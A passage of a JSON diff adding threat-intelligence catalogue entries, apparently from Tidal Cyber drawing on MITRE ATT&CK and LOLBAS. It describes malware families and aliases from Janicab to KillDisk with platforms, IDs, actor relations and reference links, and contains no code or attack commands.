[[Janicab](https://app.tidalcyber.com/references/1acc1a83-faac-41d3-a08b-cc3a539567fb)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0163", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "234e7770-99b0-4f65-b983-d3230f76a60b", + "type": "similar" + } + ], + "uuid": "a4debf1f-8a37-4c89-8ebc-31de71d33f79", + "value": "Janicab" + }, + { + "description": "[Javali](https://app.tidalcyber.com/software/853d3d18-d746-4650-a9bd-c36a0e86dd02) is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.[[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0528", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "64122557-5940-4271-9123-25bfc0c693db", + "type": "similar" + } + ], + "uuid": "853d3d18-d746-4650-a9bd-c36a0e86dd02", + "value": "Javali" + }, + { + "description": "[JCry](https://app.tidalcyber.com/software/41ec0bbc-65ca-4913-a763-1638215d7b2f) is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign.[[Carbon Black JCry May 2019](https://app.tidalcyber.com/references/deb97163-323a-493a-9c73-b41c8c5e5cd1)]", + "meta": { + "platforms": [], + "software_attack_id": "S0389", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "aaf3fa65-8b27-4e68-91de-2b7738fe4c82", + "type": "similar" + } + ], + "uuid": "41ec0bbc-65ca-4913-a763-1638215d7b2f", + "value": "JCry" + }, + { + "description": "This designation has been used in reporting both to refer to the threat group ([Skeleton Key](https://app.tidalcyber.com/software/206453a4-a298-4cab-9fdf-f136a4e0c761)) and its associated malware.[[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)]", + "meta": { + "id": "94a24271-b4cc-4012-86d3-f3146b25e0e2" + }, + "related": [ + { + "dest-uuid": "d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae", + "type": "similar" + } + ], + "uuid": "c1808fee-703d-4116-8d6e-7d181244c928", + "value": "Trojan.Sofacy" + }, + { + "description": "This designation has been used in reporting both to refer to the threat group ([APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5)) and its associated malware.[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", + "meta": { + "id": "f2393857-1a0d-423d-9e2a-4f0c3e97439b" + }, + "related": [ + { + "dest-uuid": "d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae", + "type": "similar" + } + ], + "uuid": "04241120-45d5-4261-a13b-4816d2dfc8a7", + "value": "Sednit" + }, + { + "description": "[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)][[Talos Seduploader Oct 2017](https://app.tidalcyber.com/references/2db77619-72df-461f-84bf-2d1c3499a5c0)]", + "meta": { + "id": "cd2ab3e3-3100-465b-9529-e8e52cd2e1b9" + }, + "related": [ + { + "dest-uuid": "d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae", + "type": "similar" + } + ], + "uuid": "59124557-6250-48b8-aaf8-3fc51df2c993", + "value": "Seduploader" + }, + { + "description": "[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", + "meta": { + "id": "3fbee7bb-2a32-4935-aff2-e938ca018690" + }, + "related": [ + { + "dest-uuid": "d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae", + "type": "similar" + } + ], + "uuid": "771f1cd5-dac6-43c9-8c93-9f70ce4137e1", + "value": "JKEYSKW" + }, + { + "description": "[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", + "meta": { + "id": "15e69a07-09c5-42a4-9800-3fa8152a3532" + }, + "related": [ + { + "dest-uuid": "d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae", + "type": "similar" + } + ], + "uuid": "fb803c34-1dbd-4bb4-b397-faec053abe77", + "value": "GAMEFISH" + }, + { + "description": "[[Unit 42 Sofacy Feb 2018](https://app.tidalcyber.com/references/0bcc2d76-987c-4a9b-9e00-1400eec4e606)]", + "meta": { + "id": "87b23dd6-4367-4dce-ab5b-17002959f2ef" + }, + "related": [ + { + "dest-uuid": "d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae", + "type": "similar" + } + ], + "uuid": "111fc9b5-1c08-4256-ab5b-7adf2a8bd81e", + "value": "SofacyCarberp" + }, + { + "description": "[JHUHUGIT](https://app.tidalcyber.com/software/d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae) is malware used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5). It is based on Carberp source code and serves as reconnaissance malware. [[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)] [[F-Secure Sofacy 2015](https://app.tidalcyber.com/references/56a95d3c-5268-4e69-b669-7055fb38d570)] [[ESET Sednit Part 1](https://app.tidalcyber.com/references/a2016103-ead7-46b3-bae5-aa97c45a12b7)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0044", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "8ae43c46-57ef-47d5-a77a-eebb35628db2", + "type": "similar" + }, + { + "dest-uuid": "c1808fee-703d-4116-8d6e-7d181244c928", + "type": "similar" + }, + { + "dest-uuid": "04241120-45d5-4261-a13b-4816d2dfc8a7", + "type": "similar" + }, + { + "dest-uuid": "59124557-6250-48b8-aaf8-3fc51df2c993", + "type": "similar" + }, + { + "dest-uuid": "771f1cd5-dac6-43c9-8c93-9f70ce4137e1", + "type": "similar" + }, + { + "dest-uuid": "fb803c34-1dbd-4bb4-b397-faec053abe77", + "type": "similar" + }, + { + "dest-uuid": "111fc9b5-1c08-4256-ab5b-7adf2a8bd81e", + "type": "similar" + } + ], + "uuid": "d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae", + "value": "JHUHUGIT" + }, + { + "description": "[JPIN](https://app.tidalcyber.com/software/c96fce69-6b9c-4bbc-bb42-f6a8fb6eb88f) is a custom-built backdoor family used by [PLATINUM](https://app.tidalcyber.com/groups/f036b992-4c3f-47b7-a458-94ac133bce74). Evidence suggests developers of [JPIN](https://app.tidalcyber.com/software/c96fce69-6b9c-4bbc-bb42-f6a8fb6eb88f) and [Dipsind](https://app.tidalcyber.com/software/226ee563-4d49-48c2-aa91-82999f43ce30) code bases were related in some way. [[Microsoft PLATINUM April 2016](https://app.tidalcyber.com/references/d0ec5037-aa7f-48ee-8d37-ff8fb2c8c297)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0201", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "f036b992-4c3f-47b7-a458-94ac133bce74", + "type": "used-by" + }, + { + "dest-uuid": "de6cb631-52f6-4169-a73b-7965390b0c30", + "type": "similar" + } + ], + "uuid": "c96fce69-6b9c-4bbc-bb42-f6a8fb6eb88f", + "value": "JPIN" + }, + { + "description": "[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]", + "meta": { + "id": "2ac63e52-9b97-4571-888c-9eacafb47f15" + }, + "related": [ + { + "dest-uuid": "42fe9795-5cf6-4ad7-b56e-2aa655377992", + "type": "similar" + } + ], + "uuid": "88632c03-4d0a-4307-8d96-370a9fa0c49c", + "value": "JSocket" + }, + { + "description": "[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]", + "meta": { + "id": "28fce90e-ff3d-4325-923c-ad9421ed5dd3" + }, + "related": [ + { + "dest-uuid": "42fe9795-5cf6-4ad7-b56e-2aa655377992", + "type": "similar" + } + ], + "uuid": "f5019366-a5f7-4b6f-ba22-de56a66dc7ca", + "value": "Unrecom" + }, + { + "description": "[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]", + "meta": { + "id": "861de6da-bf0d-4b12-96d5-3183680fbcac" + }, + "related": [ + { + "dest-uuid": "42fe9795-5cf6-4ad7-b56e-2aa655377992", + "type": "similar" + } + ], + "uuid": "45890a41-4d9a-4a8c-8758-9ed70c6355f4", + "value": "jFrutas" + }, + { + "description": "[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]", + "meta": { + "id": "e3ea6fd6-b394-458f-bd5d-27b165322632" + }, + "related": [ + { + "dest-uuid": "42fe9795-5cf6-4ad7-b56e-2aa655377992", + "type": "similar" + } + ], + "uuid": "c1239f48-76e5-40c5-897d-80a7d14f8613", + "value": "Adwind" + }, + { + "description": "[[NCSC Joint Report Public Tools](https://app.tidalcyber.com/references/601d88c5-4789-4fa8-a9ab-abc8137f061c)]", + "meta": { + "id": "ef49e5e8-7c03-4c7b-81f4-9448ba11cf53" + }, + "related": [ + { + "dest-uuid": "42fe9795-5cf6-4ad7-b56e-2aa655377992", + "type": "similar" + } + ], + "uuid": "7a75e4bf-a8cf-4fb0-b147-12db5a0bb77a", + "value": "jBiFrost" + }, + { + "description": "[[jRAT Symantec Aug 2018](https://app.tidalcyber.com/references/8aed9534-2ec6-4c9f-b63b-9bb135432cfb)]", + "meta": { + "id": "77568c7b-7765-4fa7-8402-f35f4f1388f8" + }, + "related": [ + { + "dest-uuid": "42fe9795-5cf6-4ad7-b56e-2aa655377992", + "type": "similar" + } + ], + "uuid": "4fcf08b4-de50-4ab6-a7ae-a3c3a64f32cc", + "value": "Trojan.Maljava" + }, + { + "description": "[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]", + "meta": { + "id": "8879a9b9-7df5-4357-819c-54d4c219869b" + }, + "related": [ + { + "dest-uuid": "42fe9795-5cf6-4ad7-b56e-2aa655377992", + "type": "similar" + } + ], + "uuid": "13f9732c-1a38-45ca-9278-4b3266e32997", + "value": "AlienSpy" + }, + { + "description": "[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]", + "meta": { + "id": "68380492-9057-4a79-828f-205a3a7596ed" + }, + "related": [ + { + "dest-uuid": "42fe9795-5cf6-4ad7-b56e-2aa655377992", + "type": "similar" + } + ], + "uuid": "cf5f6829-3cf7-445f-a4a3-dce78fe6034b", + "value": "Frutas" + }, + { + "description": "[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]", + "meta": { + "id": "53eb8894-1d69-4d53-9743-510f27c12255" + }, + "related": [ + { + "dest-uuid": "42fe9795-5cf6-4ad7-b56e-2aa655377992", + "type": "similar" + } + ], + "uuid": "2adef0c3-f776-48c1-9293-d355b9dbefd7", + "value": "Sockrat" + }, + { + "description": "[jRAT](https://app.tidalcyber.com/software/42fe9795-5cf6-4ad7-b56e-2aa655377992) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://app.tidalcyber.com/software/42fe9795-5cf6-4ad7-b56e-2aa655377992) have been distributed via a software-as-a-service platform, similar to an online subscription model.[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)] [[jRAT Symantec Aug 2018](https://app.tidalcyber.com/references/8aed9534-2ec6-4c9f-b63b-9bb135432cfb)]", + "meta": { + "platforms": [ + "Android", + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0283", + "source": "MITRE", + "tags": [ + "16b47583-1c54-431f-9f09-759df7b5ddb7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "1bfbb1e1-022c-57e9-b70e-711c601640be", + "type": "used-by" + }, + { + "dest-uuid": "efece7e8-e40b-49c2-9f84-c55c5c93d05c", + "type": "similar" + }, + { + "dest-uuid": "88632c03-4d0a-4307-8d96-370a9fa0c49c", + "type": "similar" + }, + { + "dest-uuid": "f5019366-a5f7-4b6f-ba22-de56a66dc7ca", + "type": "similar" + }, + { + "dest-uuid": "45890a41-4d9a-4a8c-8758-9ed70c6355f4", + "type": "similar" + }, + { + "dest-uuid": "c1239f48-76e5-40c5-897d-80a7d14f8613", + "type": "similar" + }, + { + "dest-uuid": "7a75e4bf-a8cf-4fb0-b147-12db5a0bb77a", + "type": "similar" + }, + { + "dest-uuid": "4fcf08b4-de50-4ab6-a7ae-a3c3a64f32cc", + "type": "similar" + }, + { + "dest-uuid": "13f9732c-1a38-45ca-9278-4b3266e32997", + "type": "similar" + }, + { + "dest-uuid": "cf5f6829-3cf7-445f-a4a3-dce78fe6034b", + "type": "similar" + }, + { + "dest-uuid": "2adef0c3-f776-48c1-9293-d355b9dbefd7", + "type": "similar" + } + ], + "uuid": "42fe9795-5cf6-4ad7-b56e-2aa655377992", + "value": "jRAT" + }, + { + "description": "[[Jsc.exe - LOLBAS Project](/references/ae25ff74-05eb-46d7-9c60-4c149b7c7f1f)]", + "meta": { + "id": "69700923-c77c-4d60-87da-34dc37a2b04e", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "1c67bf0b-22f8-4f57-8f91-f15b4923455f", + "type": "similar" + } + ], + "uuid": "adc0e1d8-3291-4c6f-9429-b6a61fb089a7", + "value": "Jsc.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary file used by .NET to compile JavaScript code to .exe or .dll format\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe\n* C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe\n\n**Resources:**\n* [https://twitter.com/DissectMalware/status/998797808907046913](https://twitter.com/DissectMalware/status/998797808907046913)\n* [https://www.phpied.com/make-your-javascript-a-windows-exe/](https://www.phpied.com/make-your-javascript-a-windows-exe/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_jsc.yml](https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml)\n* IOC: Jsc.exe should normally not run a system unless it is used for development.[[Jsc.exe - LOLBAS Project](/references/ae25ff74-05eb-46d7-9c60-4c149b7c7f1f)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5122", + "source": "Tidal Cyber", + "tags": [ + "ee16a0c7-b3cf-4303-9681-b3076da9bff0", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "adc0e1d8-3291-4c6f-9429-b6a61fb089a7", + "type": "similar" + } + ], + "uuid": "1c67bf0b-22f8-4f57-8f91-f15b4923455f", + "value": "Jsc" + }, + { + "description": "[JSS Loader](https://app.tidalcyber.com/software/c67f3029-a26c-4752-b7f1-8e3369c2f79d) is Remote Access Trojan (RAT) with .NET and C++ variants that has been used by [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) since at least 2020.[[eSentire FIN7 July 2021](https://app.tidalcyber.com/references/3976dd0e-7dee-4ae7-8c38-484b12ca233e)][[CrowdStrike Carbon Spider August 2021](https://app.tidalcyber.com/references/36f0ddb0-94af-494c-ad10-9d3f75d1d810)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0648", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "f559f945-eb8b-48b1-904c-68568deebed3", + "type": "similar" + } + ], + "uuid": "c67f3029-a26c-4752-b7f1-8e3369c2f79d", + "value": "JSS Loader" + }, + { + "description": "[KARAE](https://app.tidalcyber.com/software/ca883d21-97ca-420d-a66b-ef19a8355467) is a backdoor typically used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) as first-stage malware. [[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0215", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "used-by" + }, + { + "dest-uuid": "3c02fb1f-cbdb-48f5-abaf-8c81d6e0c322", + "type": "similar" + } + ], + "uuid": "ca883d21-97ca-420d-a66b-ef19a8355467", + "value": "KARAE" + }, + { + "description": "[Kasidet](https://app.tidalcyber.com/software/1896b9c9-a93e-4220-b4c2-6c4c9c5ca297) is a backdoor that has been dropped by using malicious VBA macros. [[Zscaler Kasidet](https://app.tidalcyber.com/references/63077223-4711-4c1e-9fb2-3995c7e03cf2)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0088", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "26fed817-e7bf-41f9-829a-9075ffac45c2", + "type": "similar" + } + ], + "uuid": "1896b9c9-a93e-4220-b4c2-6c4c9c5ca297", + "value": "Kasidet" + }, + { + "description": "[Kazuar](https://app.tidalcyber.com/software/e93990a0-4841-4867-8b74-ac2806d787bf) is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. [[Unit 42 Kazuar May 2017](https://app.tidalcyber.com/references/07e64ee6-3d3e-49e4-bb06-ff5897e26ea9)]", + "meta": { + "platforms": [ + "macOS", + "Windows" + ], + "software_attack_id": "S0265", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "536be338-e2ef-4a6b-afb6-8d5568b91eb2", + "type": "similar" + } + ], + "uuid": "e93990a0-4841-4867-8b74-ac2806d787bf", + "value": "Kazuar" + }, + { + "description": "[Kerrdown](https://app.tidalcyber.com/software/17c28e46-1005-4737-8567-d4ad9f1aefd1) is a custom downloader that has been used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) since at least 2018 to install spyware from a server on the victim's network.[[Amnesty Intl. Ocean Lotus February 2021](https://app.tidalcyber.com/references/a54a2f68-8406-43ab-8758-07edd49dfb83)][[Unit 42 KerrDown February 2019](https://app.tidalcyber.com/references/bff5dbfe-d080-46c1-82b7-272e03d2aa8c)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0585", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "8c1d01ff-fdc0-4586-99bd-c248e0761af5", + "type": "similar" + } + ], + "uuid": "17c28e46-1005-4737-8567-d4ad9f1aefd1", + "value": "Kerrdown" + }, + { + "description": "[Kessel](https://app.tidalcyber.com/software/32f1e0d3-753f-4b51-aec5-cfaa393cedc3) is an advanced version of OpenSSH which acts as a custom backdoor, mainly acting to steal credentials and function as a bot. [Kessel](https://app.tidalcyber.com/software/32f1e0d3-753f-4b51-aec5-cfaa393cedc3) has been active since its C2 domain began resolving in August 2018.[[ESET ForSSHe December 2018](https://app.tidalcyber.com/references/0e25bf8b-3c9e-4661-a9fd-79b2ad3b8dd2)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0487", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c984b414-b766-44c5-814a-2fe96c913c12", + "type": "similar" + } + ], + "uuid": "32f1e0d3-753f-4b51-aec5-cfaa393cedc3", + "value": "Kessel" + }, + { + "description": "[Kevin](https://app.tidalcyber.com/software/b9730d7c-aa57-4d6f-9125-57dcb65b02e0) is a backdoor implant written in C++ that has been used by [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) since at least June 2020, including in operations against organizations in Tunisia.[[Kaspersky Lyceum October 2021](https://app.tidalcyber.com/references/b3d13a82-c24e-4b47-b47a-7221ad449859)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1020", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "used-by" + }, + { + "dest-uuid": "e7863f5d-cb6a-4f81-8804-0a635eec160a", + "type": "similar" + } + ], + "uuid": "b9730d7c-aa57-4d6f-9125-57dcb65b02e0", + "value": "Kevin" + }, + { + "description": "[KeyBoy](https://app.tidalcyber.com/software/6ec39371-d50b-43b6-937c-52de00491eab) is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.[[CitizenLab KeyBoy Nov 2016](https://app.tidalcyber.com/references/a9394372-3981-4f41-ad66-9db343e773b1)][[PWC KeyBoys Feb 2017](https://app.tidalcyber.com/references/9ac6737b-c8a2-416f-bbc3-8c5556ad4833)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0387", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0a245c5e-c1a8-480f-8655-bb2594e3266b", + "type": "used-by" + }, + { + "dest-uuid": "5dd649c0-bca4-488b-bd85-b180474ec62e", + "type": "similar" + } + ], + "uuid": "6ec39371-d50b-43b6-937c-52de00491eab", + "value": "KeyBoy" + }, + { + "description": "[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]", + "meta": { + "id": "07ba0d37-1346-40dc-9302-2f0a11df801b" + }, + "related": [ + { + "dest-uuid": "aefbe6ff-7ce4-479e-916d-e8f0259d81f6", + "type": "similar" + } + ], + "uuid": "115076c8-07e5-4bb3-8951-0a1a57666b17", + "value": "OSX/Keydnap" + }, + { + "description": "This piece of malware steals the content of the user's keychain while maintaining a permanent backdoor [[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)].", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0276", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4b072c90-bc7a-432b-940e-016fc1c01761", + "type": "similar" + }, + { + "dest-uuid": "115076c8-07e5-4bb3-8951-0a1a57666b17", + "type": "similar" + } + ], + "uuid": "aefbe6ff-7ce4-479e-916d-e8f0259d81f6", + "value": "Keydnap" + }, + { + "description": "[KEYMARBLE](https://app.tidalcyber.com/software/a644f61e-6a9b-41ab-beca-72518351c27f) is a Trojan that has reportedly been used by the North Korean government. [[US-CERT KEYMARBLE Aug 2018](https://app.tidalcyber.com/references/b30dd720-a85d-4bf5-84e1-394a27917ee7)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0271", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "11e36d5b-6a92-4bf9-8eb7-85eb24f59e22", + "type": "similar" + } + ], + "uuid": "a644f61e-6a9b-41ab-beca-72518351c27f", + "value": "KEYMARBLE" + }, + { + "description": "[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]", + "meta": { + "id": "596141b0-1434-5db7-b6aa-b38ba7fd557f" + }, + "related": [ + { + "dest-uuid": "ba9e56b9-7904-5ec8-bb39-7f82f7b2e89a", + "type": "similar" + } + ], + "uuid": "a649459f-dd6d-424f-87c4-aeb8412ca6f6", + "value": "KEYPLUG.LINUX" + }, + { + "description": "[KEYPLUG](https://app.tidalcyber.com/software/ba9e56b9-7904-5ec8-bb39-7f82f7b2e89a) is a modular backdoor written in C++, with Windows and Linux variants, that has been used by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) since at least June 2021.[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S1051", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "6c575670-d14c-4c7f-9b9d-fd1b363e255d", + "type": "similar" + }, + { + "dest-uuid": "a649459f-dd6d-424f-87c4-aeb8412ca6f6", + "type": "similar" + } + ], + "uuid": "ba9e56b9-7904-5ec8-bb39-7f82f7b2e89a", + "value": "KEYPLUG" + }, + { + "description": "[KGH_SPY](https://app.tidalcyber.com/software/c1e1ab6a-d5ce-4520-98c5-c6df41005fd9) is a modular suite of tools used by [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) for reconnaissance, information stealing, and backdoor capabilities. [KGH_SPY](https://app.tidalcyber.com/software/c1e1ab6a-d5ce-4520-98c5-c6df41005fd9) derived its name from PDB paths and internal names found in samples containing \"KGH\".[[Cybereason Kimsuky November 2020](https://app.tidalcyber.com/references/ecc2f5ad-b2a8-470b-b919-cb184d12d00f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0526", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "8bdfe255-e658-4ddd-a11c-b854762e451d", + "type": "similar" + } + ], + "uuid": "c1e1ab6a-d5ce-4520-98c5-c6df41005fd9", + "value": "KGH_SPY" + }, + { + "description": "", + "meta": { + "id": "ce9ccd1f-884b-4cd1-9f8b-94a2dafb79ed" + }, + "related": [ + { + "dest-uuid": "b5532e91-d267-4819-a05d-8c5358995add", + "type": "similar" + } + ], + "uuid": "12213e6d-72a5-447e-9e19-2a7eb7e2d81c", + "value": "Win32/KillDisk.NBI" + }, + { + "description": "", + "meta": { + "id": "0f8c5522-3cd2-4aea-bbc7-6ba33ab37514" + }, + "related": [ + { + "dest-uuid": "b5532e91-d267-4819-a05d-8c5358995add", + "type": "similar" + } + ], + "uuid": "f716a88b-4693-4d43-97b0-c5603202d586", + "value": "Win32/KillDisk.NBH" + }, + { + "description": "", + "meta": { + "id": "f4b77018-2523-4408-a2b0-601d13d642d1" + }, + "related": [ + { + "dest-uuid": "b5532e91-d267-4819-a05d-8c5358995add", + "type": "similar" + } + ], + "uuid": "4b3409dd-72c5-4808-9d11-7806955a7231", + "value": "Win32/KillDisk.NBD" + }, + { + "description": "", + "meta": { + "id": "ccd8e126-f0e0-4587-9ee8-4ac697086e9e" + }, + "related": [ + { + "dest-uuid": "b5532e91-d267-4819-a05d-8c5358995add", + "type": "similar" + } + ], + "uuid": "c0b27dd0-0895-4ddb-97da-2d55f2c22ca6", + "value": "Win32/KillDisk.NBC" + }, + { + "description": "", + "meta": { + "id": "de61a923-4ed1-4f83-97dd-2f98c2bda21f" + }, + "related": [ + { + "dest-uuid": "b5532e91-d267-4819-a05d-8c5358995add", + "type": "similar" + } + ], + "uuid": "df0e171c-ed35-4f1d-9ded-a16e58383bd7", + "value": "Win32/KillDisk.NBB" + }, + { + "description": "[KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) variants.[[KillDisk Ransomware](https://app.tidalcyber.com/references/9d22f13d-af6d-47b5-93ed-5e4b85b94978)][[ESEST Black Energy Jan 